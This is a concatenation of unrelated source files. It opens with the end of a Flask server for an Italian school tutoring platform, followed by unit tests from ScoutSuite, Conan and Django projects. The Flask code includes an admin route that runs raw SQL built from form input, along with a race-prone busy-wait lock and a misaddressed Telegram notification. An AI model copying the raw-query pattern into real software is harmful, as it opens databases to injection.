return redirect('/peer_inspect/{}'.format(abilitazione.uid))
@app.route('/peer_add/<int:mid>/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_peer_add(mid, uid, utente):
stringa = "L'utente " + utente.username + " ha aggiunto un abilitazione a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovabi = Abilitato(mid, uid)
db.session.add(nuovabi)
db.session.commit()
return redirect('/peer_inspect/{}'.format(uid))
@app.route("/peer_remove/<int:uid>")
@rank_or_403(TipoUtente.ADMIN)
def page_peer_remove(uid, utente):
stringa = "L'utente " + utente.username + " ha tolto un abilitazione a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
entita.tipo = 0
for materia in entita.materie:
db.session.delete(materia)
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_godify/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_godify(uid, utente):
stringa = "L'utente " + utente.username + " ha reso ADMIN l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
if entita.tipo == 3:
entita.tipo = 1
else:
entita.tipo = 3
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_teacher/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_teacher(uid, utente):
entita = User.query.get_or_404(uid)
if entita.tipo == 2:
corsi = Corso.query.filter_by(pid=uid).all()
for corso in corsi:
db.session.remove(corso)
entita.tipo = 0
else:
entita.tipo = 2
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_del/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_user_del(uid, utente):
stringa = "L'utente " + utente.username + " ha ELIMINATO l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
corsi = Corso.query.filter_by(pid=entita.uid).all()
for corso in corsi:
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(corso.cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for oggetti in corso.impegno:
db.session.delete(oggetti)
db.session.delete(corso)
for materia in entita.materie:
stringa = "L'utente " + utente.username + " ha ELIMINATO la materia " + str(materia.mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(materia)
for compito in entita.impegno:
db.session.delete(compito)
db.session.delete(entita)
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_inspect/<int:pid>')
@login_or_403
def page_user_inspect(pid):
utente = find_user(session['username'])
entita = User.query.get_or_404(pid)
return render_template("User/inspect.htm", utente=utente, entita=entita)
@app.route('/user_edit/<int:uid>', methods=['GET', 'POST'])
@login_or_403
def page_user_edit(uid):
utente = find_user(session['username'])
if utente.uid != uid:
abort(403)
else:
if request.method == 'GET':
entita = User.query.get_or_404(uid)
return render_template("User/edit.htm", utente=utente, entita=entita)
else:
stringa = "L'utente " + utente.username + " ha modificato il proprio profilo"
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
if request.form["password"] != "":
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
entita.passwd = cenere
entita.classe = request.form["classe"]
entita.telegram_username = request.form["usernameTelegram"]
entita.emailgenitore = request.form['mailGenitori']
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/materia_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PROF)
def page_materia_add(utente):
if request.method == 'GET':
return render_template("Materia/add.htm", utente=utente)
else:
stringa = "L'utente " + utente.username + " ha creato una materia "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovamateria = Materia(request.form["nome"], request.form["professore"], request.form["giorno"],
request.form['ora'])
db.session.add(nuovamateria)
db.session.commit()
return redirect(url_for('page_materia_list'))
@app.route('/materia_list')
@rank_or_403(TipoUtente.PROF)
def page_materia_list(utente):
materie = Materia.query.all()
return render_template("Materia/list.htm", utente=utente, materie=materie)
@app.route('/materia_edit/<int:mid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PROF)
def page_materia_edit(mid, utente):
if request.method == 'GET':
materia = Materia.query.get_or_404(mid)
return render_template("Materia/edit.htm", utente=utente, materia=materia)
else:
stringa = "L'utente " + utente.username + " ha modificato la materia " + str(mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
materia = Materia.query.get_or_404(mid)
materia.nome = request.form['nome']
materia.professore = request.form['professore']
materia.giorno_settimana = request.form['giorno']
materia.ora = request.form['ora']
db.session.commit()
return redirect(url_for('page_materia_list'))
@app.route('/materia_del/<int:mid>')
@rank_or_403(TipoUtente.PROF)
def page_materia_del(mid, utente):
materia = Materia.query.get_or_404(mid)
corsi = Corso.query.filter_by(materia_id=mid).all()
stringa = "L'utente " + utente.username + " ha ELIMINATO la materia " + str(mid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for corso in corsi:
for impegni in corso.impegno:
db.session.delete(impegni)
db.session.delete(corso)
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(corso.cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(materia)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/corso_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.PEER)
def page_corso_add(utente):
if utente.tipo == 1:
if request.method == 'GET':
autorizzate = Materia.query.join(Abilitato).filter_by(uid=utente.uid).join(User).all()
print(autorizzate)
return render_template("Corso/add.htm", utente=utente, materie=autorizzate)
else:
stringa = "L'utente " + utente.username + "ha creato un nuovo corso "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovocorso = Corso(utente.uid, request.form['argomenti'], request.form['materia'], 0)
db.session.add(nuovocorso)
db.session.commit()
return redirect(url_for('page_dashboard'))
elif utente.tipo == 2:
if request.method == 'GET':
materie = Materia.query.all()
return render_template("Recuperi/add.htm", utente=utente, materie=materie)
else:
stringa = "L'utente " + utente.username + "ha creato un nuovo corso "
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovocorso = Corso(utente.uid, request.form['argomenti'], request.form['materia'], 1)
yyyy, mm, dd = request.form["data"].split("-", 2)
hh, mi = request.form["ora"].split(":", 1)
try:
data = datetime(int(yyyy), int(mm), int(dd), int(hh), int(mi))
except ValueError:
# TODO: metti un errore più carino
abort(400)
return
nuovocorso.appuntamento = data
nuovocorso.limite = request.form["massimo"]
db.session.add(nuovocorso)
db.session.commit()
utenze = User.query.all()
oggetto = Materia.query.filter_by(mid=request.form['materia'])
msg = "E' stato creato un nuovo corso di " + oggetto[
0].nome + "!.\nPer maggiori informazioni, collegati a Condivisione!"
broadcast(msg, utenze)
return redirect(url_for('page_dashboard'))
@app.route('/corso_del/<int:cid>')
@rank_or_403(TipoUtente.PEER)
def page_corso_del(cid, utente):
stringa = "L'utente " + utente.username + " ha ELIMINATO il corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
corso = Corso.query.get_or_404(cid)
impegni = Impegno.query.all()
for impegno in impegni:
if impegno.corso_id == cid:
db.session.delete(impegno)
stringa = "L'utente " + utente.username + " ha ELIMINATO l'impegno " + str(impegno.iid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(corso)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/corso_join/<int:cid>', methods=['GET', 'POST'])
@login_or_403
def page_corso_join(cid):
global telegramkey
utente = find_user(session['username'])
impegni = Impegno.query.filter_by(stud_id=utente.uid).all()
for impegno in impegni:
if impegno.stud_id == utente.uid and impegno.corso_id == cid:
return redirect(url_for('page_dashboard'))
corso = Corso.query.get_or_404(cid)
if corso.occupati >= corso.limite:
return redirect(url_for('page_dashboard'))
corso.occupati = corso.occupati + 1
stringa = "L'utente " + utente.username + " ha chiesto di unirsi al corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
nuovoimpegno = Impegno(studente=utente,
corso_id=cid, presente=False)
if corso.tipo != 0:
print(corso.materia.nome)
nuovoimpegno.appuntamento = corso.appuntamento
oggetto = "Condivisione - Iscrizione alla lezione"
mail = "\n\nSuo figlio si e' iscritto ad una lezione sulla piattaforma Condivisione. Per maggiori informazioni, collegarsi al sito.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
db.session.add(nuovoimpegno)
db.session.commit()
if sendemail(utente.emailgenitore, oggetto, mail):
pass
else:
pass
if utente.telegram_chat_id:
testo = "Ti sei iscritto al corso di {}, che si terrà il prossimo lunedì!".format(corso.materia)
param = {"chat_id": utente.telegram_chat_id, "text": testo}
requests.get("https://api.telegram.org/bot" + telegramkey + "/sendMessage", params=param)
else:
pass
insegnante = User.query.get_or_404(corso.pid)
if insegnante.telegram_chat_id:
testo = "Lo studente {} {} si è iscritto al tuo corso!".format(utente.nome, utente.cognome)
param = {"chat_id": utente.telegram_chat_id, "text": testo}
requests.get("https://api.telegram.org/bot" + telegramkey + "/sendMessage", params=param)
else:
pass
return redirect(url_for('page_dashboard'))
@app.route('/server_log')
@rank_or_403(TipoUtente.ADMIN)
def page_log_view(utente):
logs = Log.query.order_by(Log.ora.desc()).all()
return render_template("logs.htm", logs=logs, utente=utente)
@app.route('/corso_membri/<int:cid>')
@rank_or_403(TipoUtente.PEER)
def corso_membri(cid, utente):
query = text(
"SELECT corso.*, impegno.stud_id, impegno.presente, user.cognome, user.nome FROM corso JOIN impegno ON corso.cid = impegno.corso_id JOIN user on impegno.stud_id = user.uid WHERE corso.cid=:x;")
utenti = db.session.execute(query, {"x": cid}).fetchall()
return render_template("Corso/membri.htm", utente=utente, entita=utenti, idcorso=cid)
@app.route('/presenza/<int:uid>/<int:cid>')
@login_or_403
def page_presenza(uid, cid):
utente = find_user(session['username'])
lezione = Corso.query.get(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
else:
impegno = Impegno.query.filter_by(stud_id=uid, corso_id=cid).first()
if impegno.presente:
impegno.presente = False
else:
impegno.presente = True
db.session.commit()
return redirect(url_for('corso_membri', cid=cid))
@app.route('/impegno_del/<int:uid>/<int:cid>')
@login_or_403
def page_impegno_del(uid, cid):
utente = find_user(session['username'])
lezione = Corso.query.get(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
else:
impegno = Impegno.query.filter_by(stud_id=uid, corso_id=cid).first()
lezione.occupati = lezione.occupati - 1
db.session.delete(impegno)
db.session.commit()
return redirect(url_for('corso_membri', cid=cid))
def build_csv(utenti, lezione):
global lock
# PEER_EMAIL,MATERIA,DATA,U1_EMAIL,U1_PRESENTE,U2_EMAIL,U2_PRESENTE,U3_EMAIL,U3_PRESENTE
peer_data = User.query.get_or_404(lezione.pid)
materia = Materia.query.get_or_404(lezione.materia_id)
data = datetime.today().now()
stringa = "{},{},{}".format(peer_data.username, materia.nome, data)
for i in range(0, 3, 1):
if len(utenti) > i:
stringa = stringa + ",{},{}".format(utenti[i][13], str(utenti[i][9]))
else:
stringa = stringa + ",-,-"
while lock:
pass
lock = True
with open("./courselog.csv", "a") as csv:
csv.write(stringa + "\n")
lock = False
@app.route('/inizialezione/<int:cid>')
@login_or_403
def page_inizia(cid):
utente = find_user(session['username'])
lezione = Corso.query.get_or_404(cid)
if utente.tipo < 1 or utente.uid != lezione.pid:
abort(403)
query = text(
"SELECT corso.*, impegno.stud_id, impegno.presente, user.cognome, user.nome, user.emailgenitore, user.username FROM corso JOIN impegno ON corso.cid = impegno.corso_id JOIN user on impegno.stud_id = user.uid WHERE corso.cid=:x;")
utenti = db.session.execute(query, {"x": cid}).fetchall()
for utente2 in utenti:
if utente2[9]:
oggetto = "Condivisione - Partecipazione alla lezione"
mail = "\n\nSuo figlio e' presente alla lezione di oggi pomeriggio.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
sendemail(utente2[12], oggetto, mail)
else:
oggetto = "Condivisione - Assenza alla lezione"
mail = "\n\nSuo figlio non e' presente alla lezione di oggi pomeriggio.\nQuesto messaggio e' stato creato automaticamente da Condivisione. Messaggi inviati a questo indirizzo non verranno letti. Per qualsiasi problema, contattare la segreteria."
sendemail(utente2[12], oggetto, mail)
stringa = "L'utente " + utente.username + " ha INIZIATO il corso " + str(cid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
corso = Corso.query.get_or_404(cid)
build_csv(utenti, lezione)
impegni = Impegno.query.all()
for impegno in impegni:
if impegno.corso_id == cid:
db.session.delete(impegno)
stringa = "L'utente " + utente.username + " ha ELIMINATO l'impegno " + str(impegno.iid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
db.session.delete(corso)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/ricerca', methods=["GET", "POST"])
@rank_or_403(TipoUtente.ADMIN)
def page_ricerca(utente):
if request.method == 'GET':
return render_template("query.htm", pagetype="query")
else:
try:
result = db.engine.execute("SELECT " + request.form["query"] + ";")
except Exception as e:
return render_template("query.htm", query=request.form["query"], error=repr(e), pagetype="query")
return render_template("query.htm", query=request.form["query"], result=result,
pagetype="query")
@app.route('/lettura_registro')
@rank_or_403(TipoUtente.ADMIN)
def page_lettura_registro(utente):
global lock
while lock:
pass
lock = True
with open("./courselog.csv", "r") as csv:
logs = csv.readlines()
lock = False
stringa = ""
for log in logs:
stringa += log + "\n"
return stringa
@app.route('/brasatura/<int:mode>', methods=["GET"])
@rank_or_403(TipoUtente.ADMIN)
def page_brasatura(mode, utente):
if mode == 1:
return render_template("brasatura.htm")
elif mode == 2:
utenti = User.query.filter_by(tipo=0).all()
dstring = ""
for u in utenti:
stringa = "L'utente " + u.username + " ha BRASATO l'utente " + str(u.uid)
dstring = dstring + u.username + ";"
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
for compito in u.impegno:
db.session.delete(compito)
if brasamail == "si":
res = sendemail(u.username, "Cancellazione utente",
"Gentile utente di Condivisione,\nIn vista dell'inizio di un nuovo anno scolastico, la sua utenza su Condivisione e' stata rimossa.\nPer tornare ad usufruire dei servizi di Condivisione, le sara' necessario creare una nuova utenza.\n\nGrazie per aver utilizzato Condivisione!\nQuesto messaggio è stato creato automaticamente.")
if not res:
print("Errore Invio ad indirizzo primario.")
sendemail(u.emailgenitore, "Cancellazione utente",
"Gentile utente di Condivisione,\nIn vista dell'inizio di un nuovo anno scolastico, la sua utenza su Condivisione e' stata rimossa.\nPer tornare ad usufruire dei servizi di Condivisione, le sara' necessario creare una nuova utenza.\n\nGrazie per aver utilizzato Condivisione!\nQuesto messaggio è stato creato automaticamente.")
db.session.delete(u)
db.session.commit()
dump = open("maildump.csv", 'w')
dump.write(dstring)
return redirect(url_for('page_dashboard'))
@app.route('/api/peer_request',
methods=['POST']) # Questa funzione sarà da rimpiazzare con un sistema che permetta il caricamento da CSV
def api_peer_request():
username = request.form.get("username")
password = request.form.get("password")
if not username or not password:
abort(403)
return
if login(username, password):
richiedente = find_user(username)
if richiedente.tipo < 2:
abort(403)
email = request.form.get("email")
materie = request.form.get("materie").split(",")
newpeer = find_user(email)
if newpeer.tipo > 0:
abort(403)
for materia in materie:
materia_nome, richiede = materia.split("|")
if richiede == '1':
materie_add = Materia.query.filter_by(nome=materia_nome).all()
for materia_singola in materie_add:
nuova_abilitazione = Abilitato(materia_singola.mid, newpeer.uid)
db.session.add(nuova_abilitazione)
newpeer.tipo = 1
db.session.commit()
return "200 - DATA SAVED TO DISK"
else:
abort(403)
def thread():
global bot
bot = telepot.Bot(telegramkey)
bot.getMe()
MessageLoop(bot, handle).run_as_thread()
@app.route('/botStart')
@rank_or_403(TipoUtente.PROF)
def page_bot():
processo = threading.Thread(target=thread)
processo.start()
print("Bot Telegram avviato. API in ascolto.")
return "Successo!"
# Bot
def handle(msg):
with app.app_context():
content_type, chat_type, chat_id = telepot.glance(msg)
username = "@"
username += msg['from']['username']
if content_type == 'text':
utenza = User.query.filter_by(telegram_chat_id=chat_id).all()
if not utenza:
accedi(chat_id, username)
else:
utente = utenza[0]
testo = msg['text']
if testo == "/aiuto":
bot.sendMessage(chat_id,
"I comandi disponibili sono:\n/aiuto - Lista comandi\n/impegni - Lista degli impegni\n")
elif testo == "/impegni":
query1 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati , corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE corso.pid=:x;")
impegni = db.session.execute(query1, {"x": utente.uid}).fetchall()
query2 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati, corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE impegno.stud_id=:x;")
lezioni = db.session.execute(query2, {"x": utente.uid}).fetchall()
messaggio = ""
if len(impegni) > 0:
messaggio += "Ecco i tuoi impegni:\n"
for impegno in impegni:
messaggio += "Materia: " + impegno[5] + " "
if impegno[8]:
messaggio += rendi_data_leggibile(impegno[8])
else:
if str(impegno[6]) == "1":
giorno = "Lunedì"
elif str(impegno[6]) == "2":
giorno = "Martedì"
elif str(impegno[6]) == "3":
giorno = "Mercoledì"
elif str(impegno[6]) == "4":
giorno = "Giovedì"
else:
giorno = "Venerdì"
ora = str(impegno[7])
messaggio += giorno + " " + ora + "\n"
if len(lezioni) > 0:
messaggio += "Ecco le ripetizioni che devi ricevere:\n"
for impegno in lezioni:
messaggio += "Materia: " + impegno[5] + " "
if impegno[8]:
messaggio += rendi_data_leggibile(impegno[8])
else:
if str(impegno[6]) == "1":
giorno = "Lunedì"
elif str(impegno[6]) == "2":
giorno = "Martedì"
elif str(impegno[6]) == "3":
giorno = "Mercoledì"
elif str(impegno[6]) == "4":
giorno = "Giovedì"
else:
giorno = "Venerdì"
ora = str(impegno[7])
messaggio += giorno + " " + ora + "\n"
if len(lezioni) == 0 and len(impegni) == 0:
messaggio += "Sembra che tu non abbia impegni. Beato te!"
bot.sendMessage(chat_id, messaggio)
def accedi(chat_id, username):
with app.app_context():
utenti = User.query.filter_by(telegram_username=username).all()
print(username)
if not utenti:
bot.sendMessage(chat_id,
"Si è verificato un problema con l'autenticazione. Assicurati di aver impostato correttamete il tuo username su Condivisione")
else:
bot.sendMessage(chat_id,
"Collegamento riuscito. D'ora in avanti, il bot ti avviserà ogni volta che un corso verrà creato e riepilogherà i tuoi impegni.\nPer dissociare questo account, visita Condivisione.\n\nPer visualizzare i comandi, digita /aiuto.")
utenti[0].telegram_chat_id = chat_id
db.session.commit()
if __name__ == "__main__":
# Aggiungi sempre le tabelle non esistenti al database, senza cancellare quelle vecchie
db.create_all()
nuovrecord = Log("Condivisione avviato. Condivisione è un programma di FermiTech Softworks.",
datetime.now())
print("Bot di Telegram avviato!")
db.session.add(nuovrecord)
db.session.commit()
app.run()
|
LBindustries/Condivisione-Fermi
|
server.py
|
Python
|
lgpl-3.0
| 43,211
|
from copy import deepcopy
from tests.unit_tests.monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import ( # noqa: E501
RULES,
)
from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import (
RULE_LEVEL_DANGER,
RULE_LEVEL_WARNING,
)
from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import (
ScoutSuiteRuleService,
)
example_scoutsuite_data = {
"checked_items": 179,
"compliance": None,
"dashboard_name": "Rules",
"description": "Security Group Opens All Ports to All",
"flagged_items": 2,
"items": [
"ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
"ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
],
"level": "danger",
"path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id"
".cidrs.id.CIDR",
"rationale": "It was detected that all ports in the security group are open, "
"and any source IP address"
" could send traffic to these ports, which creates a wider attack surface "
"for resources "
"assigned to it. Open ports should be reduced to the minimum needed to "
"correctly",
"references": [],
"remediation": None,
"service": "EC2",
}
def test_get_rule_from_rule_data():
assert ScoutSuiteRuleService.get_rule_from_rule_data(example_scoutsuite_data) == RULES[0]
def test_is_rule_dangerous():
test_rule = deepcopy(RULES[0])
assert ScoutSuiteRuleService.is_rule_dangerous(test_rule)
test_rule.level = RULE_LEVEL_WARNING
assert not ScoutSuiteRuleService.is_rule_dangerous(test_rule)
test_rule.level = RULE_LEVEL_DANGER
test_rule.items = []
assert not ScoutSuiteRuleService.is_rule_dangerous(test_rule)
def test_is_rule_warning():
test_rule = deepcopy(RULES[0])
assert not ScoutSuiteRuleService.is_rule_warning(test_rule)
test_rule.level = RULE_LEVEL_WARNING
assert ScoutSuiteRuleService.is_rule_warning(test_rule)
test_rule.items = []
assert not ScoutSuiteRuleService.is_rule_warning(test_rule)
|
guardicore/monkey
|
monkey/tests/unit_tests/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
|
Python
|
gpl-3.0
| 2,287
|
import os
import patch_ng
import pytest
from conan.tools.files import patch, apply_conandata_patches
from conans.errors import ConanException
from conans.test.utils.mocks import ConanFileMock
class MockPatchset:
filename = None
string = None
apply_args = None
def apply(self, root, strip, fuzz):
self.apply_args = (root, strip, fuzz)
return True
@pytest.fixture
def mock_patch_ng(monkeypatch):
mock = MockPatchset()
def mock_fromfile(filename):
mock.filename = filename
return mock
def mock_fromstring(string):
mock.string = string
return mock
monkeypatch.setattr(patch_ng, "fromfile", mock_fromfile)
monkeypatch.setattr(patch_ng, "fromstring", mock_fromstring)
return mock
def test_single_patch_file(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file')
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == ("/my_source", 0, False)
assert len(str(conanfile.output)) == 0
def test_single_patch_file_from_forced_build(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='/my_build/patch-file')
assert mock_patch_ng.filename == '/my_build/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == ("/my_source", 0, False)
assert len(str(conanfile.output)) == 0
def test_base_path(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', base_path="subfolder")
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args == (os.path.join("/my_source", "subfolder"), 0, False)
assert len(str(conanfile.output)) == 0
def test_apply_in_build_from_patch_in_source(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("/my_source")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', base_path="/my_build/subfolder")
assert mock_patch_ng.filename.replace("\\", "/") == '/my_source/patch-file'
assert mock_patch_ng.string is None
assert mock_patch_ng.apply_args[0] == os.path.join("/my_build", "subfolder").replace("\\", "/")
assert mock_patch_ng.apply_args[1] == 0
assert mock_patch_ng.apply_args[2] is False
assert len(str(conanfile.output)) == 0
def test_single_patch_string(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.folders.set_base_source("my_folder")
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_string='patch_string')
assert mock_patch_ng.string == b'patch_string'
assert mock_patch_ng.filename is None
assert mock_patch_ng.apply_args == ("my_folder", 0, False)
assert len(str(conanfile.output)) == 0
def test_single_patch_arguments(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.folders.set_base_source("/path/to/sources")
patch(conanfile, patch_file='patch-file', strip=23, fuzz=True)
assert mock_patch_ng.filename.replace("\\", "/") == '/path/to/sources/patch-file'
assert mock_patch_ng.apply_args == ("/path/to/sources", 23, True)
assert len(str(conanfile.output)) == 0
def test_single_patch_type(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_type='patch_type')
assert 'Apply patch (patch_type)\n' == str(conanfile.output)
def test_single_patch_description(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_description='patch_description')
assert 'Apply patch: patch_description\n' == str(conanfile.output)
def test_single_patch_extra_fields(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
patch(conanfile, patch_file='patch-file', patch_type='patch_type',
patch_description='patch_description')
assert 'Apply patch (patch_type): patch_description\n' == str(conanfile.output)
def test_single_no_patchset(monkeypatch):
monkeypatch.setattr(patch_ng, "fromfile", lambda _: None)
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
with pytest.raises(ConanException) as excinfo:
patch(conanfile, patch_file='patch-file-failed')
assert 'Failed to parse patch: patch-file-failed' == str(excinfo.value)
def test_single_apply_fail(monkeypatch):
class MockedApply:
def apply(self, *args, **kwargs):
return False
monkeypatch.setattr(patch_ng, "fromfile", lambda _: MockedApply())
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
with pytest.raises(ConanException) as excinfo:
patch(conanfile, patch_file='patch-file-failed')
assert 'Failed to apply patch: patch-file-failed' == str(excinfo.value)
def test_multiple_no_version(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.conan_data = {'patches': [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
{'patch_file': 'patches/0002-implicit-copy-constructor.patch',
'base_path': 'source_subfolder',
'patch_type': 'backport',
'patch_source': 'https://github.com/google/flatbuffers/pull/5650',
'patch_description': 'Needed to build with modern clang compilers.'}
]}
apply_conandata_patches(conanfile)
assert 'Apply patch (backport): Needed to build with modern clang compilers.\n' \
== str(conanfile.output)
def test_multiple_with_version(mock_patch_ng):
conanfile = ConanFileMock()
conanfile.display_name = 'mocked/ref'
conanfile.conan_data = {'patches': {
"1.11.0": [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
{'patch_file': 'patches/0002-implicit-copy-constructor.patch',
'base_path': 'source_subfolder',
'patch_type': 'backport',
'patch_source': 'https://github.com/google/flatbuffers/pull/5650',
'patch_description': 'Needed to build with modern clang compilers.'}
],
"1.12.0": [
{'patch_file': 'patches/0001-buildflatbuffers-cmake.patch',
'base_path': 'source_subfolder', },
]}}
with pytest.raises(AssertionError) as excinfo:
apply_conandata_patches(conanfile)
assert 'Can only be applied if conanfile.version is already defined' == str(excinfo.value)
conanfile.version = "1.2.11"
apply_conandata_patches(conanfile)
assert len(str(conanfile.output)) == 0
conanfile.version = "1.11.0"
apply_conandata_patches(conanfile)
assert 'Apply patch (backport): Needed to build with modern clang compilers.\n' \
== str(conanfile.output)
|
conan-io/conan
|
conans/test/unittests/tools/files/test_patches.py
|
Python
|
mit
| 7,379
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function, division, absolute_import
from bgfiles.http import create_content_disposition
from django.test import SimpleTestCase
class CreateContentDispositionTest(SimpleTestCase):
def test(self):
header = create_content_disposition('Fußball.pdf')
self.assertEqual(b'attachment; filename="Fuball.pdf"; filename*=UTF-8\'\'Fu%C3%9Fball.pdf', header)
header = create_content_disposition('Fußball.pdf', attachment=False)
self.assertEqual(b'inline; filename="Fuball.pdf"; filename*=UTF-8\'\'Fu%C3%9Fball.pdf', header)
header = create_content_disposition(b'Fussball.pdf')
self.assertEqual(b'attachment; filename="Fussball.pdf"', header)
header = create_content_disposition(b'Fussball.pdf', attachment=False)
self.assertEqual(b'inline; filename="Fussball.pdf"', header)
expected = (b'attachment; filename="Leery Jenkins My Man .pdf"; '
b'filename*=UTF-8\'\'L%C3%A9%C3%ABr%C5%93%C3%B8y%20%20Jenkins%20%20My%20Man%20.pdf')
self.assertEqual(create_content_disposition('Léërœøy \\Jenkins/"My Man".pdf'), expected)
expected = (b'inline; filename="Leery Jenkins My Man .pdf"; '
b'filename*=UTF-8\'\'L%C3%A9%C3%ABr%C5%93%C3%B8y%20%20Jenkins%20%20My%20Man%20.pdf')
self.assertEqual(create_content_disposition('Léërœøy \\Jenkins/"My Man".pdf', attachment=False), expected)
|
climapulse/dj-bgfiles
|
tests/test_http.py
|
Python
|
bsd-3-clause
| 1,483
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls.defaults import patterns, url
